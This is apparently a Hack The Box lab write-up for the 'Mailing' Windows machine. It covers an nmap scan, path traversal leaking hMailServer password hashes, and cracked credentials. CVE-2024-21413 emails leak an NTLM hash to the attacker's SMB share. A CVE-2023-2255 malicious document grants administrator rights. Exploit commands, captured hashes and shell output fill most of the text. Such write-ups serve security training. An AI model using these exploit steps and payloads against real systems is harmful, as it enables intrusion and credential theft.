Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
| # Nmap 7.94SVN scan initiated Wed May 8 20:28:55 2024 as: nmap -sCV -p- -oN portscan.log -v 10.10.11.14
Nmap scan report for 10.10.11.14
Host is up (0.028s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4 completed CAPABILITY IMAP4rev1 NAMESPACE CHILDREN OK QUOTA RIGHTS=texkA0001 IDLE SORT ACL
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
587/tcp open smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_imap-capabilities: IMAP4 completed CAPABILITY IMAP4rev1 NAMESPACE CHILDREN OK QUOTA RIGHTS=texkA0001 IDLE SORT ACL
|_ssl-date: TLS randomness does not represent time
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-08T19:33:22
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 8 20:34:01 2024 -- 1 IP address (1 host up) scanned in 305.55 seconds
|
Inspecting Port 80
The webpage reveals the server is hosting hMailServer. There is also a button to download a PDF. The PDF provides setup instructions for the mail client. Two users are also mentioned in the document. user@mailing.htb and maya@mailing.htb.
File Disclosure
The function to download the PDF was vulnerable and granted file disclosure. Below is an example of reading the hosts file.
1
| http://mailing.htb/download.php?file=..\..\windows\system32\drivers\etc\hosts
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| # Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 mailing.htb
|
hMailServer Settings (hMailServer.INI)
To better understand hMailServer I installed it on a virtual machine. Below is the file structure of a fresh install. The settings of the application are stored in an INI file as seen below. It was possible to use the file disclosure Vulnerability to read this file and expose the password hashes.
hMailServer.INI via File Disclosure
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| [Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
|
hMailServer Database
Using the local installation I discovered the database is stored in the following directory. The file disclosure was used to download the database as well.
Cracking Hashes
The administrator hash was simple to crack as its MD5. The MSSQLCE hash appears to be MD5 but its not. After researching hMailServer I discovered the application will generate a random blowfish hash on first install. The hash had custom properties and I could not figure out how to crack it with hashcat. Thankfully there was existing projects on GitHub to reverse the hashing algorithm.
Administrator Hash (MD5)
1
| 841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
|
MSSQLCE (Blowfish Custom)
1
| 0a9f8ad8bf896b501dde74f08efd7e4c:???
|
hMailDatabase Password Decrypt
LINK: https://github.com/GitMirar/hMailDatabasePasswordDecrypter
1
2
3
| ┌─[parrot@parrot]─[~/hackthebox/mailing/hMailDatabasePasswordDecrypter]
└──╼ $./decrypt 0a9f8ad8bf896b501dde74f08efd7e4c
6FC6F69152AD
|
Reading MSSQLCE database (CompactView)
Database credentials have been obtained. CompactView was the application used to read the database as seen below.
Entering Password
Database Tables
Accounts Table
Cracking MSSQLCE Hashes
Unfortunately only two of the 4 hashes cracked. These passwords were already known so nothing of value was obtained by reading the database. A new approach is needed.
| Hash Type: 1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server |
1
2
| 255d222722e7a3aee50fec204cde83ef7f4c74abb7b0e64e28d80e19acbf0cdfcee4b8:homenetworkingadministrator
6838108550817f67b81d99ff4453b78a651b293f3bb8954e8e805f2af4ef00b0d6c4f2:password
|
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
URL: https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
It was possible to login to both administrator@mailing.htb and user@mailing.htb via SMTP. No emails in either account. However it was possible to send emails. This was the hint towards the above exploit Basically sending an email which will try load resources from an SMB share which will then leak the NTLM hash of the user who reads it.
Sending Payload
1
| python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\\\10.10.14.23\exploit\sample.wav' --subject test
|
Response via Responder
1
| maya::MAILING:c8ec32d1ad64ce29:31D743C7851DB7922EA5A6925524ED5C:01010000000000008097115293A1DA01A87857DA2A1D493F0000000002000800450033004A00570001001E00570049004E002D004800360052004500350042004100350053005800580004003400570049004E002D00480036005200450035004200410035005300580058002E00450033004A0057002E004C004F00430041004C0003001400450033004A0057002E004C004F00430041004C0005001400450033004A0057002E004C004F00430041004C00070008008097115293A1DA0106000400020000000800300030000000000000000000000000200000EB8CB46768E5D386B1BE6AF4FC56929F1E9E45A7F77A1DE26365D7811295E7F50A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320033000000000000000000
|
Cracking NTLM Hash
1
| MAYA::MAILING:c8ec32d1ad64ce29:31d743c7851db7922ea5a6925524ed5c:01010000000000008097115293a1da01a87857da2a1d493f0000000002000800450033004a00570001001e00570049004e002d004800360052004500350042004100350053005800580004003400570049004e002d00480036005200450035004200410035005300580058002e00450033004a0057002e004c004f00430041004c0003001400450033004a0057002e004c004f00430041004c0005001400450033004a0057002e004c004f00430041004c00070008008097115293a1da0106000400020000000800300030000000000000000000000000200000eb8cb46768e5d386b1be6af4fc56929f1e9e45a7f77a1de26365d7811295e7f50a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320033000000000000000000:m4y4ngs4ri
|
Logging in as Maya (WINRM)
User access granted.
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌─[✗]─[parrot@parrot]─[~/hackthebox/mailing]
└──╼ $evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cat C:\Users\maya\desktop\user.txt
51c41dde1c109b8ff732c4d354c06a41
*Evil-WinRM* PS C:\Users\maya\Documents>
|
Enumerating File System
The root directory contains a folder called Important Documents which is not default and stands out. The directory is empty but seems relevant to solving the box.
Root - Important Documents (EMPTY)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| *Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwroot
|
Program Files - LibreOffice
LibreOffice is installed which is not default and stands out. Git is also interesting.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| *Evil-WinRM* PS C:\program files> ls
Directory: C:\program files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
|
LibreOffice 7.4 Installation
Reading a text file in the installation directory uncovered the version.
1
| *Evil-WinRM* PS C:\program files\libreoffice\readmes> cat readme_en-GB.txt
|
1
| We hope you enjoy working with the new LibreOffice 7.4 and will join us online.
|
LibreOffice - CVE-2023-2255
This exploit depends on a user opening the malicious document which is a limitation. The Important Documents folder is probably there to simulate this logic which makes this exploit relevant. Looks like its possible to run commands as the user who opens the document after checking the POC.
1
| Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.
|
POC LINK: https://github.com/elweth-sec/CVE-2023-2255
Local Users
I forgot to include the first try in the writeup which was a nc.exe reverse shell. The box has defender active which stops that from working. To overcome this I decided to use native commands which will not trigger defender.
Checking the users to locate an admin account with the intention of changing their password.
1
2
3
4
5
6
7
8
| *Evil-WinRM* PS C:\> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrador DefaultAccount Invitado
localadmin maya WDAGUtilityAccount
The command completed with one or more errors.
|
Creating Payload
This should change the password of localadmin.
1
2
| ┌─[✗]─[parrot@parrot]─[~/hackthebox/mailing/CVE-2023-2255]
└──╼ $python3 CVE-2023-2255.py --cmd 'net user localadmin PasswordChange01' --output payload.odt
|
Uploading Payload
Upload successful.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| *Evil-WinRM* PS C:\important documents> upload ../payload.odt
Info: Uploading /home/parrot/hackthebox/mailing/../payload.odt to C:\important documents\payload.odt
Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /home/parrot/hackthebox/payload.odt
*Evil-WinRM* PS C:\important documents> upload payload.odt
Info: Uploading /home/parrot/hackthebox/mailing/payload.odt to C:\important documents\payload.odt
Data: 40692 bytes of 40692 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\important documents> ls
Directory: C:\important documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/9/2024 9:29 AM 30520 payload.odt
|
Attempt 1 - Failed
localadmin is not part of the remote user groups. Unable to remote in via WINRM after changing password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| *Evil-WinRM* PS C:\important documents> net user localadmin
User name localadmin
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2024-02-27 9:38:46 PM
Password expires Never
Password changeable 2024-02-27 9:38:46 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2024-05-09 9:31:16 AM
Logon hours allowed All
Local Group Memberships *Administradores
Global Group memberships *Ninguno
The command completed successfully.
|
Attempt 2
It may be possible to add the localadmin user to the remote users group. However it would be much easier and quicker to add Maya to the admin group.
Add Maya to Administrators
1
2
| ┌─[parrot@parrot]─[~/hackthebox/mailing/CVE-2023-2255]
└──╼ $python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output payload.odt
|
Upload Payload
1
2
3
4
5
6
7
| *Evil-WinRM* PS C:\important documents> upload payload2.odt
Info: Uploading /home/parrot/hackthebox/mailing/payload2.odt to C:\important documents\payload2.odt
Data: 40700 bytes of 40700 bytes copied
Info: Upload successful!
|
Checking Permissions (SUCCESS)
Maya is now an admin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| *Evil-WinRM* PS C:\important documents> net user maya
User name maya
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2024-04-12 4:16:20 AM
Password expires Never
Password changeable 2024-04-12 4:16:20 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2024-05-09 9:39:46 AM
Logon hours allowed All
Local Group Memberships *Administradores *Remote Management Use
*Usuarios *Usuarios de escritori
Global Group memberships *Ninguno
The command completed successfully.
|
Relogging as Maya (Admin Access)
It worked. Logged in as Maya with new admin permissions.
1
2
| ┌─[✗]─[parrot@parrot]─[~/hackthebox/mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-main]
└──╼ $evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri
|
Root Flag captured.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| *Evil-WinRM* PS C:\users\localadmin\desktop> ls
Directory: C:\users\localadmin\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/27/2024 4:30 PM 2350 Microsoft Edge.lnk
-ar--- 5/9/2024 8:48 AM 34 root.txt
*Evil-WinRM* PS C:\users\localadmin\desktop> type root.txt
e6dbbd706eb5d5d84ef4bff4e790177e
|